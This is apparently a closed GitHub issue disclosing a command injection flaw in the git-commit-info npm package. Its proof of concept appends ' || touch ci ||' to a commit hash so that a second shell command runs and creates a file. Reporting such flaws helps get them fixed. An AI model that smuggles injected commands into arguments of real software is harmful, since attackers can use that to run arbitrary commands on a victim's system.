Closed
Description
Hi,
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method gitCommitInfo () fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious command once he controls the hash content.
Here is the proof of concept.
const gitCommitInfo = require('git-commit-info')
// information of the latest commit in ./my_repo
gitCommitInfo({
cwd: './my_repo',
commit: '82442c2405804d7aa44e7bedbc0b93bb17707626' + " || touch ci ||", // a malicious file named ci will be crated
});
Please consider fixing it. thanks!
Metadata
Metadata
Assignees
Labels
No labels